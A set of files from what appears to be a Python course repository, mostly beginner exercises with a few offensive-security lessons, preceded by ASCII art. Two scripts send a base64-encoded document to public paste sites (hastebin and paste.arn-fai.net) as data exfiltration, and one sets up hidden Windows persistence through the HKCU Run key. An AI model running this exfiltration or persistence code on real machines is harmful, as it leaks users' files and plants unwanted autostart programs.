^87777;;;iiii777 ;77^^^^^^^^^^^^^^^^;;
^^^^^^^^^ii7] ^ o88888888877iiioo
77777o [88777777iiiiii;;778
77777iii 8877iiiii;;;77888888]
77iiii;8 [77ii;778 788888888888
7iii;;88 iii;78888 778888888888
77i;78888] ;;;;i88888 78888888888
,7;78888888 [;;i788888 7888888888]
i;788888888 ;i7888888 7888888888
;788888888] i77888888 788888888]
';88888888' [77888888 788888888]
[[8ooo88] 78888888 788888888
[88888] 78888888 788888888
^^^ [7888888 77888888]
88888888 7888887
77888888 7888887
;i88888 788888i
,;;78888 788877i7
,7;;i;777777i7i;;7
87778^^^ ^^^^87778
^^^^ o777777o ^^^
o77777iiiiii7777o
7777iiii88888iii777
;;;i7778888888877ii;;
Imperial Stormtrooper [i77888888^^^^8888877i]
(Standard Shock Trooper) 77888^oooo8888oooo^8887]
[788888888888888888888888]
88888888888888888888888888
]8888888^iiiiiiiii^888888]
<NAME> iiiiiiiiiiiiiiiiiiiiii
^^^^^^^^^^^^^
------------------------------------------------
Thank you for visiting https://asciiart.website/
This ASCII pic can be found at
https://asciiart.website/index.php?art=movies/star%20wars
''' |
dggsoares/Simple_Python_Exercises | python_101/12.2 - sockets_server.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
# Minimal TCP server: accept one client on localhost:45001, greet it, exit.
HOST = '127.0.0.1'
PORT = 45001
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    print(f'Server listening on port: {PORT}...')
    s.listen()
    # Blocks until one client connects; only that single client is served.
    conn, addr = s.accept()
    print('Connected by', addr)
    conn.sendall('Hello Human!'.encode())
dggsoares/Simple_Python_Exercises | python_101/01.2 - float.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Demonstrate the basic arithmetic operators on floats, then rounding.
print('Basic float operations')
a = 2.3
b = 3.4
addition = a + b
subtraction = a - b
multiplication = a * b
# BUG FIX: was `a * b`, which duplicated the multiplication result.
division = a / b
modulo = a % b
print(f'a = {a}')
print(f'b = {b}')
print(f'a + b = {addition}')
print(f'a - b = {subtraction}')
print(f'a * b = {multiplication}')
print(f'a / b = {division}')
print(f'a % b = {modulo}')
print('\nRound float')
x = 14.78945121
print(f'x = {x}')
print(f'x = {round(x, 2)}')
print('x = %.2f' % x)
|
dggsoares/Simple_Python_Exercises | python_101/11 - import_system.py | <filename>python_101/11 - import_system.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os.path
import datetime
from math import cos
import math as mathematics
from requests import get as get_http
from oop_python import Robot
# Exercise each import style declared above: module, submodule, from-import,
# alias, renamed from-import, and a local-package class.
print(f'Current working directory: {os.getcwd()}')
print(f'Current time: {datetime.datetime.now()}')
print(f'Cosine : {cos(12345)}')
print(f'π = {mathematics.pi}')
# Network call — requires internet access to succeed.
print(f'HTTP Status code: {get_http("https://www.google.com").status_code}')
robot_1 = Robot('Bob', 'red')
robot_1.walk()
robot_1.talk()
robot_1.stop()
dggsoares/Simple_Python_Exercises | python_201/08 - perl_nopaste.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64
import json
from bs4 import BeautifulSoup
# Exfiltrate a file through a public pastebin-style service: post the file
# base64-encoded, scrape the resulting links, fetch the raw paste back and
# decode it to verify the round trip.
requests.packages.urllib3.disable_warnings() # Disable SSL verify warnings
URL = 'http://paste.arn-fai.net/'
FILENAME_INPUT = 'top_secret_document.pdf'
FILENAME_OUTPUT = 'top_secret_document_decoded.pdf'
with open(FILENAME_INPUT, 'rb') as file_input, open(FILENAME_OUTPUT, 'wb') as file_output:
    print(f'[XXX] Sending File [XXX]')
    print(f'\t[+] Reading {FILENAME_INPUT}')
    encoded_file = base64.b64encode(file_input.read())
    print(f'\t[+] {FILENAME_INPUT} encoded in Base64')
    #POST request
    data = {
        "insert": 1,
        "name": "blackhat",
        "expires": "1w",
        "language": "Plain",
        "description": "Testing service",
        "code": encoded_file
    }
    r = requests.post(URL, data=data, verify=False)
    # The response page's first two anchors are the paste link and raw link.
    soup = BeautifulSoup(r.text, 'html.parser')
    links = soup.find_all('a')
    print(f'\t[+] Link: {links[0].get("href")}')
    print(f'\t[+] Raw file link: {links[1].get("href")}')
    print(f'\n[XXX] Retrieving File [XXX]')
    r = requests.get(links[1].get("href"), verify=False)
    print(f'\t[+] Fetching {links[1].get("href")}')
    print(f'\t[+] Decoding in Base64')
    decoded_file = base64.b64decode(r.text)
    print(f'\t[+] Writing in file {FILENAME_OUTPUT}')
    file_output.write(decoded_file)
    print(f'\t[+] Done!!!')
dggsoares/Simple_Python_Exercises | python_101/07 - for_statements.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Tour of `for` loop forms: literal list, range(), plain iteration, enumerate().
print('Number sequence: ')
for number in [1, 2, 3, 4, 5, 6]:
    print(number)
print('\nNumber sequence with range(): ')
# range(1, 7) yields 1..6 — the stop value is exclusive.
for number in range(1, 7):
    print(number)
print('\nIterating over sequence')
print('Names:')
names = ['Bob', 'Maroon', 'Damian']
for name in names:
    print('\t' + name)
print('\nIterating over sequence with enumerate()')
print('Names:')
for index, name in enumerate(names):
    print(f'\t{index} : {name}')
dggsoares/Simple_Python_Exercises | python_101/04 - dictionaries.py | <filename>python_101/04 - dictionaries.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Tour of dictionary construction styles, lookup, and membership tests.
print('Python dictionaries')
dict0 = {}
dict1 = {'a': 1, 'b': -2, 'c': 3, 'd': 4, 'e': 5}
# Same mapping built two different ways: zip() pairs vs keyword arguments.
dict2 = dict(zip(['one', 'two', 'three', 'four', 'five'], [1, 2, 3, 4, 5]))
dict3 = dict(one=1, two=2, three=3, four=4, five=5)
dict4 = dict(name='Bob', last_name='Williams', age=16)
print(dict0)
print(dict1)
print(dict2)
print(dict3)
print(f'Customer name: {dict4["name"]}, Last Name: {dict4["last_name"]} Age: {dict4["age"]}')
# `in` tests keys; use .values() to test values.
print('name' in dict4)
print('Bob' in dict4.values())
print(dict4.values())
print(dict4.items())
dggsoares/Simple_Python_Exercises | python_201/10 - self_signed_cert.py | from datetime import datetime, timedelta
from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.x509.oid import NameOID
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
CERT_FILE = "cert.pem"
KEY_FILE = "key.pem"
def create_self_signed_cert():
    """Generate a 4096-bit RSA key and a 10-year self-signed cert for 'localhost'.

    Writes PEM-encoded cert to CERT_FILE and the unencrypted private key
    to KEY_FILE in the current directory.
    """
    key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=4096,
        backend=default_backend()
    )
    # create a self-signed cert
    name = x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, 'localhost')
    ])
    now = datetime.utcnow()
    # Subject == issuer: the certificate signs itself with its own key.
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .serial_number(1000)
        .not_valid_before(now)
        .not_valid_after(now + timedelta(days=10 * 365))
        .public_key(key.public_key())
        .sign(key, hashes.SHA256(), default_backend())
    )
    with open(CERT_FILE, "wb") as output_cert:
        output_cert.write(cert.public_bytes(encoding=serialization.Encoding.PEM))
    with open(KEY_FILE, "wb") as output_key:
        # Key is written unencrypted (NoEncryption) — protect the file.
        output_key.write(key.private_bytes(encoding=serialization.Encoding.PEM,
                                           format=serialization.PrivateFormat.TraditionalOpenSSL,
                                           encryption_algorithm=serialization.NoEncryption())
                         )
create_self_signed_cert()
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_23.py | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet
def create_key(password):
    """Derive a urlsafe-base64 Fernet key from *password* (bytes) via PBKDF2-SHA256.

    NOTE(review): the salt literal b'\<KEY>' looks like a dataset-anonymized
    placeholder — restore a real fixed salt (or os.urandom(16) persisted
    alongside the ciphertext) before use.
    """
    salt = b'\<KEY>' # os.random(16)
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=100000,
        backend=default_backend()
    )
    key = base64.urlsafe_b64encode(kdf.derive(password))
    return key
def main():
    """Encrypt top_secret_document.pdf with a password-derived Fernet key."""
    password = '<PASSWORD>'
    key = create_key(password.encode())
    #Files names
    file_name = 'top_secret_document.pdf'
    encrypted_file_name = 'top_secret_document_fernet_encrypted'
    # Encrypt file
    with open(file_name, 'rb') as file_input, open(encrypted_file_name, 'wb') as file_output:
        file_output.write(Fernet(key).encrypt(file_input.read()))
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_201/04 - xor_encryption.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import string
import random
def generate_key(length):
    """Return a random key of *length* characters drawn from letters and punctuation."""
    pool = string.ascii_letters + string.punctuation
    chars = [random.choice(pool) for _ in range(length)]
    return ''.join(chars)
def xor(message, key):
    """XOR each character of *message* with the matching character of *key*.

    Truncates to the shorter of the two strings; applying the same key
    twice recovers the original message.
    """
    out = []
    for m_char, k_char in zip(message, key):
        out.append(chr(ord(m_char) ^ ord(k_char)))
    return ''.join(out)
def main():
    """Interactive demo: XOR-encrypt a user-supplied message with a random
    one-time key of equal length, then decrypt it to prove the round trip."""
    print(f'[+++] Simple XOR Encryption/Decryption [+++]')
    message = input(' [X] Message to encrypt: ')
    key = generate_key(len(message))
    encrypted_message = xor(message, key)
    # XOR is its own inverse when the same key is applied again.
    decrypted_message = xor(encrypted_message, key)
    print(f'\t [|] Key: {key[:25]}')
    print(f'\t [|] Key size: {len(key)}')
    print(f'\t [|] Message: {message}')
    print(f'\t [|] Encrypted message: {encrypted_message}')
    print(f'\t [|] Decrypted message: {decrypted_message}')
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_101/12.1 - sockets.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket

# Minimal TCP client: connect to the companion server on localhost:45001
# and print its one-shot greeting.
HOST = '127.0.0.1'
PORT = 45001
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    data = s.recv(1024).decode()
    print(data)
dggsoares/Simple_Python_Exercises | exercises_answer/ex_22-1.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64
def xor(message, key):
    """Return *message* XOR'd character-wise against *key* (truncates to shorter)."""
    pairs = zip(message, key)
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in pairs)
# Fetch a base64-encoded, XOR-encrypted message from a local service and
# decrypt it with the shared static key.
URL = "http://localhost:3321"
key = 'PythonOffensive201#@113445'
r = requests.get(URL)
encoded_message = base64.b64decode(r.content)
decrypted_message = xor(encoded_message.decode(), key)
print(f'Received message : {r.content}')
print(f'Decrypted message : {decrypted_message}')
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_23-2.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet
def create_key(password):
    """Derive a urlsafe-base64 Fernet key from *password* (bytes) via PBKDF2-SHA256.

    Must use the same salt and iteration count as the encrypting script,
    or decryption will fail.  NOTE(review): the salt literal b'\<KEY>'
    looks like a dataset-anonymized placeholder — confirm the real value.
    """
    salt = b'\<KEY>' # os.random(16)
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=100000,
        backend=default_backend()
    )
    key = base64.urlsafe_b64encode(kdf.derive(password))
    return key
def main():
    """Decrypt the Fernet-encrypted document produced by the companion script."""
    password = '<PASSWORD>'
    key = create_key(password.encode())
    #Files names
    encrypted_file_name = 'top_secret_document_fernet_encrypted'
    decrypted_file_name = 'top_secret_document_fernet_decrypted.pdf'
    # Decrypt file
    with open(encrypted_file_name, 'rb') as file_input, open(decrypted_file_name, 'wb') as file_output:
        file_output.write(Fernet(key).decrypt(file_input.read()))
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_101/10 - file_operations.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Tour of file I/O: three ways to read, two ways to write, and a copy.
print('[+] First Read')
with open('file.txt', 'r') as file:
    # Whole file in one string.
    print(file.read())
print('\n[+] Second Read')
with open('file.txt', 'r') as file:
    # Line at a time; readline() returns '' at EOF, which ends the loop.
    while True:
        line = file.readline()
        print(line, end='')
        if not line:
            break
print('\n\n[+] Third Read')
with open('file.txt', 'r') as file:
    # Idiomatic form: the file object itself iterates over lines.
    for line in file:
        print(line, end='')
print('\n\n[+] First Writing')
with open('file_output.txt', 'w') as file_output:
    data_to_write = 'Some text\n' * 100
    file_output.write(data_to_write)
    print('\t[|] Done writing file!')
data = {'ip': '127.0.0.1'}
print('\n\n[+] Second Writing')
with open('file_output_dict.txt', 'w') as file_output_dict:
    # write() needs a string — dicts must be converted (str/json) first.
    file_output_dict.write(str(data))
    print('\t[|] Done writing dict to a file!')
print('\n\n[+] Reading and Writing')
with open('file.txt', 'r') as file_input, open('file_output_2.txt', 'w') as file_output:
    file_output.write(file_input.read())
    print('\t[|] Done copying files!')
dggsoares/Simple_Python_Exercises | python_201/06.1 - fernet_encryption.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cryptography.fernet import Fernet
# Demonstrate symmetric encryption with Fernet: generate a key, encrypt a
# message, decrypt it back — all in memory.
print(f'[+++] Fernet Encryption/Decryption tool [+++]')
message = "I turned my phone on airplane mode and threw it in the air. Worst transformer ever."
print(f'\t[|] Message to encrypt: {message}')
key = Fernet.generate_key()
print(f'\t[|] Fernet key: {key}')
cipher_suite = Fernet(key)
# Fernet works on bytes, hence the encode()/decode() round trips.
cipher_text = cipher_suite.encrypt(message.encode())
print(f'\t[|] Message encrypted: {cipher_text.decode()}')
plain_text = cipher_suite.decrypt(cipher_text)
print(f'\t[|] Message decrypted: {plain_text.decode()}')
dggsoares/Simple_Python_Exercises | exercises_answer/ex_16_client.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
HOST = 'py.insidertips.xyz'
PORT = 30045
def do_math(a, b, operator):
    """Apply *operator* ('+', '-', '*' or '/') to a and b, returned as bytes.

    Returns None for any unrecognized operator (matching the original's
    implicit fall-through).
    """
    operations = {
        '+': lambda: a + b,
        '-': lambda: a - b,
        '*': lambda: a * b,
        '/': lambda: a / b,
    }
    op = operations.get(operator)
    return str(op()).encode() if op is not None else None
# Challenge client: the server sends three "a&b&op" math problems; answer
# each with do_math() and finally print the server's success message.
# NOTE(review): the three request/response rounds are copy-pasted — a loop
# would remove the triplication; left as-is here.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    # Banner
    print(s.recv(1024).decode())
    # First response
    # Raw data
    print('[+] First response')
    raw_data = s.recv(1024).decode()
    print(f'[+] Raw data: {raw_data}')
    # Split data: format is "<a>&<b>&<operator>"
    split_data = raw_data.split('&')
    print(f'[+] Split data: {split_data}')
    a = int(split_data[0])
    b = int(split_data[1])
    operator = split_data[2]
    first_response = do_math(a, b, operator)
    s.send(first_response)
    print(f'[+] First reponse: {first_response}\n')
    # Second response
    # Raw data
    print('[+] Second response')
    raw_data = s.recv(1024).decode()
    print(f'[+] Raw data: {raw_data}')
    # Split data
    split_data = raw_data.split('&')
    print(f'[+] Split data: {split_data}')
    a = int(split_data[0])
    b = int(split_data[1])
    operator = split_data[2]
    second_response = do_math(a, b, operator)
    s.send(second_response)
    print(f'[+] Second reponse: {second_response}\n')
    # Third response
    # Raw data
    print('[+] Third response')
    raw_data = s.recv(1024).decode()
    print(f'[+] Raw data: {raw_data}')
    # Split data
    split_data = raw_data.split('&')
    print(f'[+] Split data: {split_data}')
    a = int(split_data[0])
    b = int(split_data[1])
    operator = split_data[2]
    third_response = do_math(a, b, operator)
    s.send(third_response)
    print(f'[+] Third response: {third_response}\n')
    # Correct message
    data = s.recv(1024).decode()
    print(data)
|
dggsoares/Simple_Python_Exercises | python_101/01.3 - booleans.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Booleans are a subclass of int (True == 1, False == 0); any non-zero
# number is truthy.
print('Booleans type') # True or False
print(f'True equals {int(True)} int number')
print(f'False equals {int(False)} int number')
print(f'1 evaluate to: {bool(1)}')
print(f'And so every non-zero number: {bool(-45)}')
print(f'0 evaluate to: {bool(0)}')
print('Logic operators') # AND, OR, NOT
print(f'not True: {not True}')
print(f'not False: {not False}')
print(f'True and True: {True and True}')
print(f'False or True: {False or True}')
|
dggsoares/Simple_Python_Exercises | python_101/01.1 - integer.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Comments on Python!
'''
Multi
Lines
Comments
on
Python
'''
# Demonstrate basic integer arithmetic, then comparison operators.
print('Basic integer operations')
a = 4
b = 5
addition = a + b
subtraction = a - b
multiplication = a * b
# BUG FIX: was `a * b`, which duplicated the multiplication result.
division = a / b
modulo = a % b
print(f'a = {a}')
print(f'b = {b}')
print(f'a + b = {addition}')
print(f'a - b = {subtraction}')
print(f'a * b = {multiplication}')
print(f'a / b = {division}')
print(f'a % b = {modulo}')
print('\nInteger Comparison')
print(f'11 > 15 = {11 > 15}')
print(f'11 < 15 = {11 < 15}')
print(f'11 <= 15 = {11 <= 15}')
print(f'11 >= 15 = {11 >= 15}')
print(f'11 == 15 = {11 == 15}')
print(f'11 != 15 = {11 != 15}')
|
dggsoares/Simple_Python_Exercises | python_201/07 - hastebin.py | <reponame>dggsoares/Simple_Python_Exercises<filename>python_201/07 - hastebin.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64
import json
# Exfiltrate a file through hastebin: POST the base64 blob to /documents/,
# then fetch it back via the returned key and decode it to verify.
requests.packages.urllib3.disable_warnings() # Disable SSL verify warnings
URL = 'https://hastebin.com/documents/'
FILENAME_INPUT = 'top_secret_document.pdf'
FILENAME_OUTPUT = 'top_secret_document_decoded.pdf'
with open(FILENAME_INPUT, 'rb') as file_input, open(FILENAME_OUTPUT, 'wb') as file_output:
    print(f'[XXX] Sending File [XXX]')
    print(f'\t[+] Reading {FILENAME_INPUT}')
    encoded_file = base64.b64encode(file_input.read())
    print(f'\t[+] {FILENAME_INPUT} encoded in Base64')
    r = requests.post(URL, data=encoded_file, verify=False)
    # Response is JSON: {"key": "<paste-id>"}.
    link_file = json.loads(r.text)
    print(f'\t[+] Or this link: {"".join(URL.split("d")[:1]) + link_file["key"]}')
    print(f'\t[+] Access this link: {URL + link_file["key"]}')
    print(f'\n[XXX] Retrieving File [XXX]')
    r = requests.get(URL + link_file["key"], verify=False)
    print(f'\t[+] Fetching {URL + link_file["key"]}')
    file_encoded = json.loads(r.text)
    print(f'\t[+] Decoding in Base64')
    decoded_file = base64.b64decode(file_encoded['data'])
    print(f'\t[+] Writing in file {FILENAME_OUTPUT}')
    file_output.write(decoded_file)
    print(f'\t[+] Done!!!')
|
dggsoares/Simple_Python_Exercises | python_101/03 - lists.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Tour of list construction, mutation, and comprehensions.
list1 = []
print(list1)
list2 = list()
print(list2)
list3 = [1, 2, 3, 4, 5]
print(list3)
list4 = ['One', 'Two', 'Three', 'Four', 'Five']
print(list4)
# Lists may mix types freely.
list5 = ['One', 2, 'Three', 4, 'Five']
print(list5)
string = 'Pythonic Way of Life!'
# list() on a string yields its individual characters.
list_from_string = list(string)
print(list_from_string)
# An empty list is falsy.
if list1:
    print('Not Empty')
else:
    print('Is empty')
print(f'Size of "list5": {len(list5)}')
list5.append(5)
list5.append('Six')
print(f'"list5" : {list5}')
# extend() appends each element; append(list4) would nest the whole list.
list5.extend(list4)
print(f'"list5" : {list5}')
# pop() removes and returns the last element.
element = list5.pop()
print(f'"element" : {element}')
print(f'"list5" : {list5}')
list5.clear()
print(f'"list5" : {list5}')
# List comprehensions
aux_list = []
for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
    aux_list.append(x + 5)
print(f'"For" : {aux_list}')
print(f'List comprehensions: {[x + 5 for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]]}')
print(f'Using range(): {[x + 5 for x in range(11)]}')
aux_list_2 = []
for x in range(11):
    aux_list_2.append(x + 5)
dggsoares/Simple_Python_Exercises | python_201/01 - knockd_client.py | <filename>python_201/01 - knockd_client.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
# Port-knocking client: hits the configured knock sequence so the knockd
# daemon on `host` opens the challenge port, reads the banner, then sends
# the closing sequence.
host = '192.168.246.128'
# Knock sequence - order matters to knockd.
ports = [
    {'number': 4433, 'protocol': 'tcp'},
    {'number': 8800, 'protocol': 'tcp'},
    {'number': 1234, 'protocol': 'udp'},
    {'number': 3088, 'protocol': 'tcp'},
]
challenge_port = 6667
for port in ports:
    if port['protocol'] == 'udp':
        # UDP knock: a single datagram is enough; no connection needed.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.sendto('something'.encode(), (host, port['number']))
    else:
        # TCP knock: a SYN is enough, so use a non-blocking connect_ex()
        # and close immediately without waiting for the handshake.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setblocking(False)
            s.connect_ex((host, port['number']))
            s.close()
print(f'Port {challenge_port} OPEN!')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, challenge_port))
    print(s.recv(3072).decode())
# Close port
# Second knock sequence tells knockd to close the challenge port again.
ports = [7000, 8000, 9000]
for port in ports:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setblocking(False)
        s.connect_ex((host, port))
        s.close()
print(f'Port {challenge_port} CLOSED!')
dggsoares/Simple_Python_Exercises | python_101/08 - while_statement.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Two equivalent counting loops: an infinite loop with an explicit break,
# and a condition-controlled loop.
print('While 1')
count = 0
while True:
    count += 1
    print(f'Count: {count}')
    if count == 10:
        break
print('\nWhile 2')
count = 0
while count < 10:
    count += 1
    print(f'Count: {count}')
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_14_client.py | <filename>exercises_answer/ex_14_client.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import base64
# Client for challenge 1.4: connect, read the banner, send the expected
# phrase, and print the server's verdict.
HOST = 'py.insidertips.xyz'
PORT = 30001
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    # Banner
    print(s.recv(2048).decode())
    # Response
    message = 'Hello World!'.encode()
    s.send(message)
    print(f'Message sent: {message}\n')
    # Receive response
    data = s.recv(1024).decode()
    print(data)
dggsoares/Simple_Python_Exercises | python_201/09 - persistence.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import shutil
import ctypes
import winreg
# Educational Windows persistence demo: copies this script into the user's
# Documents folder, hides the copy, and registers it under the HKCU Run key.
FILENAME = __file__
path = os.getcwd() + '\\'
userprofile = os.getenv('userprofile')
destination = userprofile + '\\Documents\\' + FILENAME
print('[+] System recon')
print(f'\t[|] Working directory: {path}')
print(f'\t[|] User profile: {userprofile}')
print(f'\t[|] Destination: {destination}')
# If the copy already exists, assume persistence is in place and bail out.
if os.path.exists(destination):
    print('\n[X] System already touched, nothing to do...')
    exit()
else:
    print(f'[+] Persisting file: {FILENAME}')
    # NOTE(review): path + FILENAME assumes __file__ is a bare filename
    # relative to the cwd; an absolute __file__ would break this - confirm.
    shutil.copyfile(path + FILENAME, destination)
    print('\t[+] File copy complete')
    # 0x02 = FILE_ATTRIBUTE_HIDDEN.
    ctypes.windll.kernel32.SetFileAttributesW(destination, 0x02)
    print('\t[+] File hiding complete')
    with winreg.OpenKey(
            winreg.HKEY_CURRENT_USER,
            r"Software\Microsoft\Windows\CurrentVersion\Run",
            0,
            winreg.KEY_ALL_ACCESS
    ) as key:
        winreg.SetValueEx(
            key,
            'Malicious-entry',
            0,
            winreg.REG_SZ, destination
        )
    print('\t[+] Register udpate..')
|
dggsoares/Simple_Python_Exercises | python_201/03 - simple_http_server.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from http.server import HTTPServer, BaseHTTPRequestHandler
class MyHTTPServer(BaseHTTPRequestHandler):
    """Minimal handler that answers every GET with a fixed greeting."""
    def do_GET(self):
        # Protocol order matters: status line, headers, end_headers(), body.
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        message = "Hello world from My HTTP Server!"
        self.wfile.write(message.encode())
# Bind on all interfaces, port 32001, and serve until interrupted.
# ('server_adress' typo kept as-is; it is a local name only.)
server_adress = ('', 32001)
httpd = HTTPServer(server_adress, MyHTTPServer)
print('Running server...')
httpd.serve_forever()
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_22.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from http.server import HTTPServer, BaseHTTPRequestHandler
import base64
def xor(message, key):
    """XOR two strings character by character and return the result.

    zip() truncates to the shorter of the two inputs, so the result is
    at most min(len(message), len(key)) characters long.  Applying the
    same key twice recovers the original message.
    """
    mixed = []
    for msg_char, key_char in zip(message, key):
        mixed.append(chr(ord(msg_char) ^ ord(key_char)))
    return "".join(mixed)
class MyHTTPServer(BaseHTTPRequestHandler):
    """GET handler serving an XOR-encrypted, Base64-encoded message."""
    def do_GET(self):
        message = "The Python Offensive Class"
        # Key is exactly as long as the message; xor() truncates to the
        # shorter input (zip semantics), so a shorter key would drop data.
        key = 'PythonOffensive201#@113445'
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        encrypted_message = xor(message, key)
        encoded_message = base64.b64encode(encrypted_message.encode())
        self.wfile.write(encoded_message)
# Bind on all interfaces, port 3321, and serve until interrupted.
server_adress = ('', 3321)
httpd = HTTPServer(server_adress, MyHTTPServer)
print('Running server...')
httpd.serve_forever()
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_11.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ipwhois import IPWhois
import json
import pickle
# Ex 1.1
# Read a file called 'exercise11.txt' with IPs, create a list of targets using the data structures Lists
# and Dictionaries and print them.
from pprint import pprint
# Build the target list: one {'ip': ...} dict per line of exercise11.txt,
# with the trailing newline stripped from each address.
targets = []
with open('exercise11.txt', 'r') as source:
    targets = [{'ip': raw_line.replace('\n', '')} for raw_line in source]
# pprint(targets)
# Ex 1.2
# Using the Whois library see information for each target present in the list created in the previous exercise
# and update the information for each IP in the list.
# For each target, run a WHOIS lookup and merge the results back into the
# `targets` list built above.
for index, target in enumerate(targets):
    # Whois Lookup
    print(f'{index} : {target["ip"]}')
    lookup = IPWhois(target['ip']).lookup_whois()
    # Each 'nets' entry may carry several comma-separated CIDRs.
    cidrs = [cidr for line in lookup['nets'] for cidr in line['cidr'].replace(' ', '').split(',')]
    description = [line['description'].replace('\n', '') for line in lookup['nets'] if line['description'] is not None]
    address = [line['address'].replace('\n', '') for line in lookup['nets'] if line['address'] is not None]
    # Fixed: the original read `if line['emails'] if not None`, i.e. two
    # filter clauses where the second (`not None`) is always True.  The
    # intended None-guard is `is not None`.
    emails = [email for line in lookup['nets'] if line['emails'] is not None for email in line['emails']]
    # Information retrieved
    target['cidrs'] = cidrs
    target['descriptions'] = description
    target['address'] = address
    target['emails'] = emails
    # Update the target list
    targets[index] = target
# Ex 1.3
# Write in file called 'exercise13.txt' the lists of targets used in the previous exercise.
# Persist the enriched target list three ways - str(), JSON and pickle -
# then read each back.  (Filename 'execises13' typo is kept consistently
# across writers and readers, so round-tripping still works.)
with open('execises13.txt', 'w') as file_output:
    for target in targets:
        file_output.write(str(target))
        file_output.write('\n')
with open('execises13_json.txt', 'w') as file_output_json:
    file_output_json.write(json.dumps(targets))
with open('execises13_pickle.txt', 'wb') as file_output_pickle:
    file_output_pickle.write(pickle.dumps(targets))
# Reading targets list from file
with open('execises13.txt', 'r') as file_input:
    print('\n----- STANDARD LOADS -----')
    # str(dict) output cannot be parsed back with dict(); hence commented out.
    # for line in file_input:
    #     targets.append(dict(line))
with open('execises13_json.txt', 'r') as file_input_json:
    targets = json.loads(file_input_json.read())
    print('\n----- JSON LOADS -----')
    pprint(targets)
    print('\n----- HOST INFORMATION -----')
    print(f'IP: {targets[3]["ip"]}')
    print(f'Descriptions: {targets[3]["descriptions"]}')
    print(f'CIDRs: {targets[3]["cidrs"]}')
    print(f'Adress: {targets[3]["address"]}')
    print('---------------------------')
# SECURITY: pickle.loads executes arbitrary code - only safe here because
# the file was produced by this same script.
with open('execises13_pickle.txt', 'rb') as file_input_pickle:
    targets = pickle.loads(file_input_pickle.read())
    print('\n----- PICKLE LOADS -----')
    pprint(targets)
|
dggsoares/Simple_Python_Exercises | python_101/13 - oop_python.py | <filename>python_101/13 - oop_python.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class Robot:
    """Base robot with a name and a color; can talk, walk and stop."""

    def __init__(self, name, color):
        # Public attributes, also read by the derived robot classes.
        self.name = name
        self.color = color

    def talk(self):
        # __class__.__name__ makes the greeting reflect the subclass type.
        greeting = f"Hi Human! I'm {self.name} robot, have {self.color} color and type '{self.__class__.__name__}'"
        print(greeting)

    def walk(self):
        status = f'WALKING -> {self.name}'
